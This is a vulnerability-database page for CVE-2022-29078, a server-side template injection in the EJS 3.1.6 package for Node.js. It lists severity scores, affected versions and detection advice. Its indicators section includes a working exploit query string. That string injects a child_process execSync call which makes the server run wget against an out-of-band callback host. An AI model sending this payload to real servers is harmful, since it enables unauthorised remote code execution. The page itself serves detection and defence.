cbcvebase.
CVE-2022-29078
published 2022-04-25

CVE-2022-29078: The ejs (aka Embedded JavaScript templates) package 3.1.6 for Node.js allows server-side template injection in settings[view options][outputFunctionName]. This…

PriorityP185critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
32.39%
98.1th percentile
The ejs (aka Embedded JavaScript templates) package 3.1.6 for Node.js allows server-side template injection in settings[view options][outputFunctionName]. This is parsed as an internal option, and overwrites the outputFunctionName option with an arbitrary OS command (which is executed upon template compilation).

Affected

3 ranges
VendorProductVersion rangeFixed in
debiannode-ejs< node-ejs 3.1.7-1 (bookworm)node-ejs 3.1.7-1 (bookworm)
ejsejs
ejsejs>= 0 < 3.1.73.1.7

Detection & IOCsextracted from sources · hover to see the quote

urlGET /page?id={{randstr}}&settings[view%20options][outputFunctionName]=x;process.mainModule.require(%27child_process%27).execSync(%27wget+http://{{interactsh-url}}%27);s HTTP/1.1
commandsettings[view options][outputFunctionName]=x;process.mainModule.require('child_process').execSync('wget+http://{{interactsh-url}}');s
path/page?id=<randstr>&settings[view options][outputFunctionName]=<payload>
  • Detect SSTI exploitation attempts targeting the EJS outputFunctionName parameter via HTTP query string. Look for the pattern 'settings[view' or 'outputFunctionName' in URL query parameters, especially combined with Node.js process/child_process invocations.
  • Monitor HTTP requests containing URL-encoded child_process or execSync strings in query parameters, which indicate active exploitation of CVE-2022-29078 RCE payload delivery.
  • Alert on HTTP responses containing 'You are viewing page number' as a confirmation of successful EJS template rendering, which can be used to confirm a vulnerable EJS endpoint.
  • Out-of-band (OOB) HTTP callback detection: exploitation payloads use wget or similar tools to beacon to an external URL. Monitor for unexpected outbound HTTP requests from Node.js/EJS application processes.
  • ·The vulnerability is specific to EJS version 3.1.6 for Node.js. Versions 3.1.7 and above (and Debian-patched 2.5.7-3+deb11u1) are not affected. Ensure version fingerprinting is part of detection triage.
  • ·The attack vector requires the application to pass user-controlled input into EJS render settings (specifically the 'view options' namespace). Applications that do not expose this parameter path are not exploitable even on vulnerable EJS versions.
  • ·Several Red Hat packages are listed as 'Not affected' or 'Will not fix', meaning presence of EJS 3.1.6 in a container image does not automatically imply exploitability — context of how EJS is invoked matters.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv9.8CRITICAL
vulncheck9.8CRITICAL
vendor_debian9.8CRITICAL
vendor_redhat9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.